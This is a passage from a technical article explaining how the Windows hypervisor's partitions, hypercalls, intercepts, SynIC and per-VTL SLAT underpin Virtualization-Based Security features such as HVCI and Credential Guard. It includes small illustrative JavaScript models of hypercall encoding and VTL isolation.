        FW1 --> HW1
    end
    subgraph After["After hyperjacking"]
        OS2["Victim OS (now a guest)"]
        VMM["Hostile VMM (SubVirt / Blue Pill)"]
        FW2["Firmware (UEFI)"]
        HW2["Hardware"]
        OS2 --> VMM
        VMM --> FW2
        FW2 --> HW2
    end
```

The three demonstrations established a difficult dual truth. The hypervisor is the most powerful defender against an OS-level attacker, and it is the most powerful attacker against an OS-level defender. The same primitive can play either role; which role it plays in any given system depends only on whose hypervisor it is and whether the OS above it can prove that. SubVirt-style attacks did not require Microsoft to invent anything new -- they only had to be a possibility -- to force Microsoft into a design constraint: any "hypervisor as security primitive" architecture has to start by being the only hypervisor on the box, with a measurement of the hypervisor binary recorded in a TPM platform configuration register so that any malicious VMBR underneath could be detected at attestation time. This is the role that System Guard Secure Launch (DRTM) plays in the architecture, and we will return to it in section 11.

Blue Pill (offense) and VBS (defense) are architecturally identical. Each is a thin Type-1 hypervisor that interposes between firmware and OS. Each owns the CPU's virtualization mode, the second-level page tables, and the IOMMU. Each is invisible to the OS unless the OS can prove what is underneath it. The only differences between them are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege. The defense is the offense, run by the right people, in the right order, and attested to.

By 2010 the security community had agreed: the hypervisor is the most powerful primitive in the system, and whoever owns the SLAT page tables owns the box. Joanna Rutkowska's Invisible Things Lab launched Qubes OS, an explicitly hypervisor-rooted security OS, on April 7, 2010 [@qubes-introducing-2010]. Microsoft owned the SLAT page tables. They had a hypervisor on every Windows install. They had a server-consolidation product. What they did not yet have was a reason to re-purpose any of it for security. The reason was already being filed at the United States Patent and Trademark Office. The priority date was September 17, 2013.

6. The Pivot -- VSM, VTLs, and the Hepkin-Kishan Patent

On September 17, 2013, David Hepkin and Arun Kishan filed United States patent application 14/186,415, which would issue on August 30, 2016 as US Patent 9,430,642 B2 [@us9430642b2-patent]. The patent's title, "Providing virtual secure mode with different virtual trust levels," reads like marketing now because the words it introduced -- "Virtual Trust Level," "VTL," "Virtual Secure Mode" -- became Microsoft's own canonical terminology. In 2013 the words did not exist. The patent describes, in 2013, exactly what Microsoft shipped twenty-two months later in Windows 10 build 10240 [@ms-tlfs-vsm].

The patent's claim language is unusually specific. It teaches a virtual-machine manager that makes "multiple different virtual trust levels available to virtual processors of a virtual machine"; it teaches that "different memory access protections (such as the ability to read, write, and/or execute memory) can be associated with different portions of memory (e.g., memory pages) for each virtual trust level"; and it teaches that "the virtual trust levels are organized as a hierarchy with a higher level virtual trust level being more privileged than a lower virtual trust level." Each of those phrases is now a feature of the shipping Microsoft hypervisor.

Virtual Trust Level (VTL): A hypervisor-managed privilege level inside a single partition. Each VTL has its own SLAT mapping (so the same machine page can be readable in one VTL and absent in another), its own virtual-processor register state (so a VTL transition is a context switch, not a procedure call), and its own interrupt subsystem (so interrupts targeted at one VTL do not preempt code running in another). VTLs are hierarchical: a higher VTL can read all of a lower VTL's memory, but not vice versa. The shipping Microsoft hypervisor implements two VTLs (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen [@ms-tlfs-vsm].

Windows 10 RTM on July 29, 2015, and Windows Server 2016, shipped VBS atop the existing Hyper-V hypervisor [@wp-windows-10]. The architectural innovation -- the thing the patent was for -- was that VTL0 (Normal world, containing the NT kernel, user mode, and LSASS) and VTL1 (Secure world, containing the Secure Kernel and Isolated User Mode trustlets) ran inside the same partition rather than in two separate partitions. VBS is not a second VM. It is a per-VTL SLAT split inside the root partition, plus a per-VTL register-state snapshot, plus a per-VTL interrupt delivery surface. The hypervisor switches SLAT contexts on VTL transitions, exactly as it would switch SLAT contexts on a partition switch -- but the switch happens inside a single partition's address space, so there is no extra VM scheduling and no extra OS image to manage.

```mermaid
flowchart TD
    subgraph Root["Root partition"]
        subgraph VTL0["VTL0 -- Normal world"]
            NT["NT kernel (ntoskrnl.exe)"]
            User["User mode (lsass.exe, applications)"]
        end
        subgraph VTL1["VTL1 -- Secure world"]
            SK["Secure Kernel (securekernel.exe)"]
            IUM["Isolated User Mode trustlets"]
            LSAISO["LSAISO.EXE"]
            VTPM["vTPM trustlet"]
            IUM --- LSAISO
            IUM --- VTPM
        end
    end
    HV["Microsoft Hypervisor (hvix64 / hvax64)"]
    HW["Hardware (CPU, RAM, IOMMU, TPM)"]
    VTL0 -. "Secure call (hypercall + SynIC)" .-> VTL1
    VTL1 --> HV
    VTL0 --> HV
    HV --> HW
```

The Hyper-V Top-Level Functional Specification, chapter 15, names the architectural facts verbatim. "VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis." "Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels." "Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL's. Currently, only two VTLs are implemented." The C-level definition #define HV_NUM_VTLS 2 is published in the same specification [@ms-tlfs-vsm]. Two VTLs are what ships; the architecture has room for more.

VSM enables operating system software in the root and guest partitions to create isolated regions of memory for storage and processing of system security assets. Access to these isolated regions is controlled and granted solely through the hypervisor, which is a highly privileged, highly trusted part of the system's Trusted Compute Base (TCB). -- Microsoft, *Hyper-V Top-Level Functional Specification*, chapter 15 [@ms-tlfs-vsm]

This is the second insight the article is built around: VBS is not a re-architecture. It is a re-purposing. The hypervisor was already on every Windows install for unrelated reasons. The 2015 pivot did not require new hardware, new VMs, or new CPUs. It required a new way to organize what was already there -- two SLAT mappings instead of one, two register snapshots instead of one, a secure-call ABI on top of the SynIC -- and a Windows-side Secure Kernel binary to run inside the new VTL1 view. The patent gave the design its formal expression; the engineering had been waiting since 2008 for the right architectural insight. David Hepkin spent over a decade on the NT kernel architecture team before the VSM design; Arun Kishan was an NT kernel architect and is now Microsoft's Corporate Vice President for the Operating Systems Platform group. Neither is a virtualization specialist by background. Their patent is, in retrospect, a kernel-team idea about how to put a piece of the kernel itself behind a hardware boundary the kernel cannot cross -- exactly the kind of design that an architect who had lived inside ntoskrnl.exe for years would invent.

Alex Ionescu's Black Hat USA 2015 deck "Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture" reverse-engineered the entire VSM stack within four weeks of Windows 10 RTM [@ionescu-bh-2015]. The vocabulary Ionescu introduced has become the canonical research language for talking about VBS: VTL as "synthetic ring level managed by the hypervisor"; trustlets for the user-mode processes that run inside VTL1's Isolated User Mode; Signature Level 12 plus the IUM EKU 1.3.6.1.4.1.311.10.3.37 as the loader's signing requirement. Microsoft's own developer documentation now uses the same terms [@ms-iso-user-mode-trustlets].

The pivot, then, was not a sudden re-architecture. It was the cash-out of a deliberate multi-year engineering plan that began at least twenty-two months before Windows 10 RTM. To see what VBS actually enforces -- and which hypervisor primitive backs each piece of that enforcement -- we need to walk the hypervisor's public surface. There are five surfaces. They are the architectural body of the article.

7. Architecture Tour -- The Hypervisor's Public Surface

What does the Windows hypervisor actually look like as a piece of software? It is a small kernel, on the order of one to two hundred thousand lines of C and C++ by community estimate; Microsoft has not published a primary line count. It has five externally visible surfaces, all of which are documented in the Hyper-V Top-Level Functional Specification (TLFS) v6.0b [@ms-tlfs-pdf]. We walk them in turn.

7.1 Partitions, VMBus, and the VSP/VSC pair

A partition is the hypervisor's unit of isolation. From the Microsoft architecture page: "The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems" [@ms-hyperv-architecture]. The root partition is a full Windows install with privileged hypercalls and direct access to hardware; each child partition is a guest VM with only the hardware the root has chosen to expose.

A guest VM does I/O over the VMBus. A network packet, for example, travels from the guest application down to the guest's Windows NDIS stack; through the synthetic NIC miniport driver (the Virtualization Service Client, or VSC) in the guest's kernel; over the VMBus message channel; into the network Virtualization Service Provider (VSP) in the root partition; into the root's real NDIS stack; into the physical NIC driver; out the wire. The hypervisor's role in this chain is structural: it owns the VMBus message channel, the SynIC interrupts that notify the VSP and VSC of new traffic, and the per-partition SLAT mappings that decide which bytes either side can read.

The architectural implication is that device emulation lives in the root partition, not in the hypervisor binary. The TCB the hypervisor binary itself has to protect is narrow. The TCB the root partition's drivers have to protect is much wider -- but those drivers live in normal Windows kernel mode, where Microsoft has thirty years of tooling. This is why almost every public Hyper-V CVE since 2018 has landed in vmswitch.sys, storvsp.sys, or the NT Kernel Integration VSP, rather than in hvix64.exe itself.

Note: Putting device emulation in the root partition means the hypervisor binary does not need to parse Ethernet frames, SCSI commands, USB descriptors, or graphics-adapter command rings. The trade-off is that the root partition becomes part of the TCB -- a root-partition kernel-mode bug is a hypervisor-equivalent break -- but the small hypervisor binary itself can be reviewed, fuzzed, and reasoned about as a single piece of code.

7.2 The hypercall ABI

Hypercalls are how partitions request services from the hypervisor. The TLFS documents two flavors. A fast hypercall passes its parameters inline in CPU registers: on x64, rcx carries a 64-bit hypercall input value (the low 16 bits are the call code; the upper 48 bits are a control word with fields for the Fast flag, variable-header size, Rep Count, and Rep Start Index), rdx carries the first input parameter, and r8 carries the second. A slow hypercall instead passes the GPA (guest physical address) of an input-parameter page in rdx, and the GPA of an output-parameter page in r8; the actual parameter content lives in those pages. The instruction that triggers the hypercall is vmcall on Intel and vmmcall on AMD; the hypervisor maps both onto the same internal entry point [@ms-tlfs-pdf].

Hypercall: A guest-to-hypervisor call. The guest issues `vmcall` (Intel) or `vmmcall` (AMD); the CPU traps via VM-EXIT into the hypervisor in VMX root mode; the hypervisor reads the call code from `rcx`, reads the inputs from registers (fast) or from a GPA-pointed page (slow), services the request, writes outputs back, and returns via VM-ENTRY. Hypercalls are the only legitimate way for a partition to invoke hypervisor services [@ms-tlfs-pdf].

```javascript
// A JavaScript model of the rcx hypercall input value layout.
// In a real hypercall the guest sets rcx, rdx, r8 and issues vmcall / vmmcall.
function packHypercallInput({ callCode, fastFlag, varHeaderSize, isNested, repCount, repStartIdx }) {
  // rcx layout (TLFS section 3 "Hypercall Interface", verbatim bit map)
  //   bits  0..15  Call Code
  //   bit   16     Fast (1 = inline params in rdx/r8)
  //   bits 17..26  Variable header size (in QWORDs)
  //   bits 27..30  RsvdZ
  //   bit   31     Is Nested
  //   bits 32..43  Rep Count
  //   bits 44..47  RsvdZ
  //   bits 48..59  Rep Start Index
  //   bits 60..63  RsvdZ
  let rcx = 0n;
  rcx |= BigInt(callCode) & 0xFFFFn;
  if (fastFlag) rcx |= 1n << 16n;
  rcx |= (BigInt(varHeaderSize) & 0x3FFn) << 17n;
  if (isNested) rcx |= 1n << 31n;
  rcx |= (BigInt(repCount) & 0xFFFn) << 32n;
  rcx |= (BigInt(repStartIdx) & 0xFFFn) << 48n;
  return rcx;
}

// HvCallPostMessage = 0x005C, fast hypercall (TLFS section 11)
const rcx = packHypercallInput({
  callCode: 0x005C,
  fastFlag: 1,
  varHeaderSize: 0,
  isNested: 0,
  repCount: 0,
  repStartIdx: 0,
});
console.log('rcx = 0x' + rcx.toString(16).padStart(16, '0'));
// Output: rcx = 0x000000000001005c
```
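Going the other way is just as mechanical, and it is roughly the first thing any receiver of a hypercall input value has to do. The sketch below decodes a 64-bit value using the same bit map as the packing model above. `unpackHypercallInput` and `RESERVED_MASK` are names invented for this example, and the rep-call value at the end uses an arbitrary call code chosen only to exercise the rep fields.

```javascript
// Bits documented as RsvdZ in the layout: 27..30, 44..47, 60..63.
const RESERVED_MASK = (0xFn << 27n) | (0xFn << 44n) | (0xFn << 60n);

// Decode a 64-bit hypercall input value into its fields.
function unpackHypercallInput(value) {
  const v = BigInt.asUintN(64, BigInt(value));
  return {
    callCode: Number(v & 0xFFFFn),
    fast: ((v >> 16n) & 1n) === 1n,
    varHeaderSize: Number((v >> 17n) & 0x3FFn),
    isNested: ((v >> 31n) & 1n) === 1n,
    repCount: Number((v >> 32n) & 0xFFFn),
    repStartIdx: Number((v >> 48n) & 0xFFFn),
    // A set bit in any RsvdZ range means the value is malformed.
    reservedClear: (v & RESERVED_MASK) === 0n,
  };
}

// The value printed by the packing model: call code 0x5C with the Fast bit.
const simple = unpackHypercallInput(0x1005cn);

// An illustrative rep call: arbitrary call code 0x0B, Rep Count 3, Rep Start Index 1.
const rep = unpackHypercallInput(0x0Bn | (3n << 32n) | (1n << 48n));

// A malformed value with a reserved bit (bit 27) set.
const bad = unpackHypercallInput(1n << 27n);

console.log(simple.callCode.toString(16), simple.fast);   // 5c true
console.log(rep.repCount, rep.repStartIdx);               // 3 1
console.log(bad.reservedClear);                           // false
```

Rejecting values with reserved bits set is a design choice of this sketch; it is the kind of input validation that the hypercall surface depends on.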

The call-code space is small and well-documented: a few hundred codes, each one a structured request with typed inputs and outputs. The hypercall path is also where the most consequential 2024 Hyper-V CVE lived. CVE-2024-21407 was a use-after-free in hvix64.exe's handling of a specific file-operation hypercall, the rare case where the bug was in the hypervisor binary itself rather than in a root-partition driver [@nvd-cve-2024-21407].

7.3 Intercepts

Intercepts are how the hypervisor virtualizes guest behavior. The TLFS distinguishes four categories: instruction intercepts (CPUID, MSR reads/writes, I/O-port instructions), exception intercepts (page faults, general protection faults), memory-access intercepts (a guest tries to read or write a specific guest-physical-address region), and partition-state intercepts (a guest hits a state that the hypervisor wants to be notified about). Each is configured per-partition through the Intel VMCS execution-control bits or the AMD VMCB control fields [@ms-tlfs-pdf].

Intercept: A configurable hypervisor notification on a specific guest event. The hypervisor programs the VMCS or VMCB to fire a VM-EXIT when the guest issues a particular instruction, raises a particular exception, accesses a particular memory region, or transitions to a particular state. Intercepts are the policy mechanism that lets the hypervisor implement device emulation, security checks, and VTL transitions [@ms-tlfs-pdf].

For VBS, the load-bearing intercept is the memory-access intercept. When VTL0 code tries to access a region whose VTL0 SLAT mapping is unreadable or unwritable, the access traps to the hypervisor with the offending GPA; the hypervisor can deliver the intercept to the VTL1 Secure Kernel as a secure call, letting VTL1 see what VTL0 was trying to do and decide whether to allow it. This is how HVCI's W^X enforcement is wired: a VTL0 page that is marked writable in VTL0's SLAT is marked non-executable in the same SLAT; an attempt to switch the same page to executable becomes a memory-access intercept that VTL1 must approve.
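The approval flow can be sketched as a small state machine. This is a toy model under stated assumptions: the SLAT is a `Map` of per-page permission flags, the VTL1 policy is a hypothetical `vtl1Approve` function, and "approved contents" is a plain `Set` standing in for whatever code-integrity check VTL1 actually performs. None of these names are Windows or hypervisor APIs.

```javascript
// VTL0's second-level view: guest-physical page number -> permissions.
const vtl0Slat = new Map([
  [0x100, { r: true, w: true, x: false }],   // an ordinary writable data page
]);

// Hypothetical VTL1 policy. A page may become executable only if its contents
// are approved and the same request drops write permission.
function vtl1Approve(page, wanted, approvedPages) {
  if (wanted.w && wanted.x) return false;                 // never W and X together
  if (wanted.x && !approvedPages.has(page)) return false; // unapproved contents
  return true;
}

// Hypervisor side: VTL0 cannot edit the SLAT itself, it can only ask.
function requestProtectionChange(page, wanted, approvedPages) {
  if (!vtl0Slat.has(page)) return 'no such page';
  if (!vtl1Approve(page, wanted, approvedPages)) return 'denied';
  vtl0Slat.set(page, { ...wanted });
  return 'granted';
}

const nothingApproved = new Set();
const page100Approved = new Set([0x100]);

// Writable and executable at once: refused regardless of contents.
const rwx = requestProtectionChange(0x100, { r: true, w: true, x: true }, page100Approved);
// Executable but contents not approved: refused.
const unapproved = requestProtectionChange(0x100, { r: true, w: false, x: true }, nothingApproved);
// Approved contents, write permission dropped: allowed.
const ok = requestProtectionChange(0x100, { r: true, w: false, x: true }, page100Approved);

console.log(rwx, unapproved, ok);   // denied denied granted
```

The property worth noticing is that the only code able to call `vtl0Slat.set` sits on the far side of the approval check; VTL0 never holds a reference to its own second-level table.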

7.4 The Synthetic Interrupt Controller (SynIC)

The Synthetic Interrupt Controller, SynIC, is the hypervisor's per-virtual-processor event delivery surface. Each VP has 16 Synthetic Interrupt Source (SINT) lines, a message page (where the hypervisor places message-shaped events), an event-flag page (where it places bit-flag events), and a set of synthetic timers. SynIC is the bus on which VMBus traffic between VSP and VSC moves; it is also the bus on which VTL transitions between VTL0 and VTL1 are delivered inside the root partition [@ms-tlfs-pdf].

Synthetic Interrupt Controller (SynIC): A hypervisor-emulated interrupt controller, parallel to the hardware APIC, that delivers hypervisor-originated events to a virtual processor. Each VP has 16 SINT lines, a message page, an event-flag page, and synthetic timers. VMBus signaling rides on SynIC; secure-call delivery between VTL0 and VTL1 rides on SynIC; vTPM, virtual-PCI, and other paravirtualized device events ride on SynIC [@ms-tlfs-pdf].

For VBS, the secure-call ABI -- the way VTL0 code asks VTL1 to do something -- is built on SynIC. A VTL0 caller writes a request into a shared message page, signals a SINT, and yields the CPU; the hypervisor switches SLAT context to VTL1, delivers the message, and lets VTL1 read the request. When VTL1 finishes, it signals a SINT back to VTL0 and the hypervisor switches contexts again. Credential Guard's whole communication path between VTL0 LSASS and VTL1 LSAISO is one of these secure-call channels.
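The round trip described above can be traced with a small model. The sketch is illustrative only: `ToyHypervisor`, `registerSecureService`, and the message-page shape are invented for this example, and copying the request before VTL1 acts on it is a design choice of the sketch rather than a documented detail of the real ABI.

```javascript
// Toy model of a secure-call round trip. Every name here is hypothetical.
class ToyHypervisor {
  constructor() {
    this.activeVtl = 0;          // which VTL's view is currently live
    this.services = new Map();   // service id -> VTL1 handler
    this.trace = [];             // ordered log of the steps taken
  }

  // Called by the VTL1 side at setup time to expose a service.
  registerSecureService(id, handler) {
    this.services.set(id, handler);
  }

  // Called once VTL0 has filled the shared message page and signalled a SINT.
  secureCall(messagePage) {
    this.trace.push('VTL0: signal SINT and yield');
    this.activeVtl = 1;
    this.trace.push('HV: switch SLAT context to VTL1');

    // VTL1 works on a private copy, so VTL0 cannot alter the request
    // after it has been read.
    const request = JSON.parse(JSON.stringify(messagePage));
    const handler = this.services.get(request.serviceId);
    const reply = handler
      ? { status: 'ok', result: handler(request.payload) }
      : { status: 'unknown service' };
    this.trace.push('VTL1: service request, signal SINT back');

    this.activeVtl = 0;
    this.trace.push('HV: switch SLAT context to VTL0');
    return reply;
  }
}

const hv = new ToyHypervisor();
hv.registerSecureService(1, (payload) => payload.toUpperCase());

const reply = hv.secureCall({ serviceId: 1, payload: 'ping' });
const missing = hv.secureCall({ serviceId: 99, payload: 'ping' });

console.log(reply.result);      // PING
console.log(missing.status);    // unknown service
console.log(hv.trace.slice(0, 4).join('\n'));
```

VTL0 sees only the reply object; the handler table and the copy VTL1 worked on never cross back.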

7.5 Memory and per-VTL SLAT

The last surface is also the most important: memory. Guest physical addresses (GPAs) are translated to system physical addresses (SPAs) by per-partition SLAT page tables. The hypervisor has exclusive control of these tables; no partition, including the root, can read or modify them directly. For VBS specifically, the hypervisor maintains two SLAT mappings per partition -- one for VTL0 and one for VTL1 -- and switches between them on VTL transitions.

This is the architectural reason VTL0 kernel mode, even with full Ring-0 code execution, cannot read or execute VTL1 memory. The VTL0 page-table walker on a load from a VTL1-only page does not see the page at all; the SLAT walker on the host returns no mapping; the hardware MMU raises an EPT/NPT violation; the hypervisor handles the violation according to the intercept policy configured for VTL0. In the security-relevant case, the hypervisor delivers an access-denied result to VTL0 and continues. There is no kernel-mode mov instruction sequence that can defeat this, because the gating happens in hardware page-table walks that VTL0 kernel mode cannot influence.
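As a rough illustration of the per-VTL split, the sketch below keeps two second-level views for one partition and checks each access against the view of the VTL that issued it. The page numbers, the permission strings, and the `access` helper are assumptions made for the example; the real tables are hardware page-table structures, not maps of strings.

```javascript
// One partition, two second-level views (toy model).
// Permissions are written as 'rwx'-style strings with '-' for "not allowed".
const slatByVtl = {
  0: new Map([[0x10, 'rw-'], [0x11, 'r-x']]),                 // VTL0 view
  1: new Map([[0x10, 'rw-'], [0x11, 'r-x'], [0x20, 'rw-']]),  // VTL1 view
};

// kind is 'r', 'w', or 'x'. The check uses only the issuing VTL's view.
function access(vtl, gpaPage, kind) {
  const perms = slatByVtl[vtl].get(gpaPage);
  if (perms === undefined) return 'violation: not mapped';
  return perms.includes(kind) ? 'ok' : `violation: no ${kind}`;
}

console.log(access(0, 0x20, 'r'));  // violation: not mapped
console.log(access(1, 0x20, 'r'));  // ok
console.log(access(1, 0x10, 'r'));  // ok
console.log(access(0, 0x11, 'w'));  // violation: no w
```

Page `0x20` plays the role of a VTL1-only page: from VTL0 it is simply absent, while VTL1 can still see everything VTL0 can, matching the hierarchy described earlier.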

Five surfaces. Two of them -- the hypercall ABI and the device-emulation paths that surface over VMBus -- are where every public Hyper-V escape since 2018 has lived. The other three (intercepts, SynIC, per-VTL SLAT) are the substrate on which VBS, HVCI, Credential Guard, and System Guard Secure Launch are built. We turn to those next.

8. How the Hypervisor Enforces Each VBS Feature

The hypervisor itself does not know anything about credentials, code signing, application allowlisting, or DMA protection. It knows about partitions, VTLs, intercepts, SLAT entries, and hypercalls. Each Windows security feature is built by composing those primitives in a specific way. The mapping is precise and worth walking, because it is what makes the substrate a security primitive rather than just a virtualization product [@ms-hardware-root-of-trust].

HVCI / Memory Integrity. Hypervisor-protected Code Integrity is the most consequential VBS feature on a per-byte basis: it changes Windows from a system that lets the kernel execute any signed driver to one where the kernel cannot execute any page until VTL1 has approved it. VTL1's code-integrity service inspects every kernel-mode page mapping change request before the SLAT entry that would make the page executable in VTL0 is granted. The W^X invariant -- a single page can be writable or executable, but never both -- is enforced not by NT kernel cooperation but by the per-VTL SLAT, exactly as described in section 7.5. An NT-kernel attempt to mark a writable page executable becomes a memory-access intercept that VTL1's CI service evaluates [@ms-enable-vbs-hvci]. The hypervisor primitives composed: per-VTL SLAT + memory-access intercepts + secure-call ABI.

Trustlet: A user-mode process that runs inside VTL1's Isolated User Mode (IUM). Trustlets must be signed with the Windows System Component Verification certificate (Signature Level 12) and carry the IUM EKU `1.3.6.1.4.1.311.10.3.37`. The shipping inbox trustlets include `LSAISO.EXE` (Credential Guard), `VMSP.EXE` (host side of virtual TPM), and the vTPM provisioning trustlet [@ms-iso-user-mode-trustlets, @ionescu-bh-2015].

Credential Guard. LSAISO.EXE -- the LSA-Isolated trustlet -- runs in VTL1 Isolated User Mode. NTLM password hashes and Kerberos Ticket-Granting Tickets that LSASS used to keep in normal VTL0 memory are moved to VTL1 memory that VTL0 cannot read. VTL0 LSASS performs credential operations by sending a request to LSAISO over a secure-call channel mediated by the hypervisor's SynIC; LSAISO does the cryptographic work and returns a result. The plaintext of the credential never leaves VTL1. This is why a Ring-0 attacker on a Credential Guard-enabled Windows install cannot dump LSASS hashes -- they aren't in LSASS [@ms-iso-user-mode-trustlets]. The hypervisor primitives composed: per-VTL SLAT (to hide LSAISO's memory) + SynIC (to deliver secure calls) + intercepts (to catch VTL0 attempts to access LSAISO memory). See the sibling Credential Guard / NTLMless article for VTL1 internals.

The VTL0-to-VTL1 calling convention. A VTL0 caller fills in a shared parameter page, signals a SynIC interrupt configured for VTL transition, and yields. The hypervisor switches SLAT context to VTL1, delivers the message, and lets the Secure Kernel dispatch it via `IumInvokeSecureService` to a registered VTL1 service. On return, the hypervisor switches contexts back. The whole round-trip is mediated by hypervisor primitives the calling VTL cannot bypass [@ionescu-bh-2015].
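The round trip can be modeled in a few lines. This is a minimal sketch under stated assumptions, not the real ABI: `createSecureKernel`, the service number, and the parameter shape are all invented, and the closure merely stands in for memory that the per-VTL SLAT hides from VTL0.

```javascript
// Toy model of a secure-call round trip. Nothing here is a real Windows API:
// createSecureKernel, SERVICE_VERIFY, and the parameter shape are invented.
function createSecureKernel(secretEntries, serviceEntries) {
  const secrets = new Map(secretEntries); // stands in for VTL1-only memory
  const services = new Map(serviceEntries); // service number -> handler
  return {
    // The only thing the "VTL0" caller can reach is invoke().
    invoke(serviceId, paramPage) {
      const handler = services.get(serviceId);
      if (typeof handler !== 'function') return { status: 'INVALID_SERVICE' };
      return { status: 'OK', result: handler(paramPage, secrets) };
    },
  };
}

const SERVICE_VERIFY = 1; // hypothetical service number
const sk = createSecureKernel(
  [['cred', 'hunter2']],
  [[SERVICE_VERIFY, (params, secrets) => secrets.get(params.name) === params.candidate]],
);

const reply = sk.invoke(SERVICE_VERIFY, { name: 'cred', candidate: 'hunter2' });
console.log(reply); // { status: 'OK', result: true }
console.log(Object.keys(sk)); // [ 'invoke' ]
```

The caller learns whether the candidate matched but never receives the stored value, which is the same shape as the Credential Guard exchange described earlier: the request crosses the boundary, the secret does not.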

Application Control (WDAC). The same VTL1 code-integrity service that backs HVCI also evaluates user-mode policy. When VTL0 user mode tries to load a binary that is restricted by WDAC policy, the load becomes a secure call into VTL1; VTL1's policy engine evaluates the signature, the certificate chain, and the configured policy; the secure call returns approval or denial. WDAC policy lives in VTL1, the policy database lives in VTL1, and a VTL0 administrator who has been compromised cannot edit either. The hypervisor primitives composed: same as HVCI, plus a richer secure-call API for policy evaluation.

VBS Enclaves. A third-party application can load native code into a VTL1 IUM enclave. The enclave executes in VTL1, with its memory hidden from VTL0; the application talks to the enclave through a secure-call ABI exposed by the Secure Kernel. Architecturally parallel to Credential Guard but available to ordinary application developers. The hypervisor primitives composed: per-VTL SLAT (to hide enclave memory) + secure-call ABI (to invoke enclave code) + a Secure Kernel API for enclave creation, attestation, and destruction.

System Guard Secure Launch (DRTM). Intel TXT's SENTER instruction (and AMD's SKINIT on AMD platforms) executes a hardware-rooted dynamic measurement of the hypervisor and the Secure Kernel into TPM PCRs 17-22 after firmware initialization [@ms-system-guard-secure-launch]. This re-establishes the trust root post-firmware: a pre-boot firmware compromise that survived UEFI Secure Boot cannot silently poison the hypervisor's launch state without showing up as an unexpected measurement in a PCR that VTL1 can read. The hypervisor primitives composed: DRTM event registration with the hardware + TPM PCR extension + a VTL1-side attestation API. See the sibling Secure Boot article for the static-RTM half of the same story.

Kernel DMA Protection. External devices over Thunderbolt, USB4, or hot-plug PCIe can issue DMA to arbitrary physical addresses, bypassing the CPU's MMU entirely. The hypervisor configures the IOMMU (Intel VT-d / AMD-Vi) to deny DMA from externally-attached devices outside of explicitly-authorized memory regions, and to refuse DMA from any device before its kernel-mode driver has been loaded under a trusted policy [@ms-kernel-dma-protection]. The hypervisor primitives composed: hypervisor-owned IOMMU configuration + memory-access intercepts on the IOMMU configuration MMIO region.

The shape of the table is the point.

| Feature | Composed primitives | Verbatim hypervisor mechanism |
| --- | --- | --- |
| HVCI | per-VTL SLAT + memory-access intercepts + secure-call ABI | VTL1 vets each VTL0 page-mapping change before granting +X |
| Credential Guard | per-VTL SLAT + SynIC + intercepts | LSAISO trustlet memory absent from VTL0 SLAT mapping |
| WDAC (AppControl) | secure-call ABI + VTL1 policy engine | VTL0 binary load = secure call into VTL1 CI service |
| VBS Enclaves | per-VTL SLAT + secure-call ABI | Third-party VTL1 IUM enclave invoked over secure call |
| System Guard Secure Launch | hardware DRTM (TXT/SKINIT) + TPM PCR extension | `SENTER` / `SKINIT` measures hypervisor into PCRs 17-22 |
| Kernel DMA Protection | hypervisor-owned IOMMU + MMIO intercepts | VT-d/AMD-Vi denies DMA outside authorized regions |

The hypervisor knows nothing about NTLM hashes, Kerberos tickets, code-signing certificates, WDAC policy XML, or DMA-region authorization. All of that policy lives in VTL1 -- in the Secure Kernel, in LSAISO, in the WDAC service. The hypervisor only provides the *mechanism* for one piece of policy to evaluate a request from another piece of policy in isolation. This is the architectural separation that lets the hypervisor binary stay small and the Windows-side security feature set keep growing.

The pattern: each feature is a different composition of the same five primitives (partitions, hypercalls, intercepts, SynIC, per-VTL SLAT). The hypervisor is genuinely a primitive in the formal sense -- a small set of mechanisms that compose into many security policies. If the hypervisor is the mechanism, the boundary the hypervisor enforces is the contract. Microsoft commits to servicing certain attacks against that boundary and explicitly excludes others. To know what we are getting, we need to read the contract.

9. The Security Boundary Microsoft Commits To

The Microsoft Security Servicing Criteria for Windows is a public document. It enumerates which classes of attack Microsoft will issue a CVE and an out-of-band patch for, and which it will not. For the hypervisor, the document is unusually specific [@ms-msrc-servicing-criteria].

The two relevant boundaries:

Hypervisor / virtualization boundary. An L1-guest-to-host or guest-to-guest break is a serviced boundary. If a guest VM can execute code in the root partition or in another guest's address space, Microsoft will issue a CVE.
Virtual Secure Mode (VBS) boundary. VTL0 kernel-mode code reading or writing VTL1 memory, or executing VTL1 code, is a serviced break. If a Ring-0 attacker in VTL0 can defeat the per-VTL SLAT, Microsoft will issue a CVE.

What the servicing criteria does not commit to is also worth naming. A same-VTL elevation of privilege inside a guest (a guest user becoming guest SYSTEM) is not a hypervisor break -- it is a Windows EoP, serviced under the Windows kernel boundary, not the hypervisor boundary. A denial-of-service of the host from a guest is generally not a serviced hypervisor break unless it produces a memory corruption that an attacker can ride to RCE. An administrator in the root partition reading guest memory is not a break at all -- the root partition is part of the hypervisor's TCB by definition, and root-partition admin is hypervisor-admin in the threat model.
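The cases named so far can be written down as a lookup table. This is a hypothetical encoding of the prose in this section, not a restatement of the servicing criteria document itself; the `from` and `to` labels and the `classifyBoundary` name are made up for the sketch.

```javascript
// Hypothetical encoding of the boundary cases described in the prose.
// The labels are invented; consult the servicing criteria for real decisions.
const BOUNDARY_RULES = [
  { from: 'guest', to: 'root partition', serviced: true, boundary: 'hypervisor' },
  { from: 'guest', to: 'another guest', serviced: true, boundary: 'hypervisor' },
  { from: 'VTL0 kernel', to: 'VTL1', serviced: true, boundary: 'VBS' },
  { from: 'guest user', to: 'guest SYSTEM', serviced: true, boundary: 'Windows kernel' },
  { from: 'root-partition admin', to: 'guest memory', serviced: false, boundary: 'none (root is in the TCB)' },
];

function classifyBoundary(from, to) {
  const rule = BOUNDARY_RULES.find((r) => r.from === from && r.to === to);
  if (!rule) return { serviced: null, boundary: 'not covered by this sketch' };
  return { serviced: rule.serviced, boundary: rule.boundary };
}

console.log(classifyBoundary('guest', 'root partition')); // hypervisor boundary, serviced
console.log(classifyBoundary('guest user', 'guest SYSTEM')); // serviced, but as a Windows EoP
console.log(classifyBoundary('root-partition admin', 'guest memory')); // not a break
```

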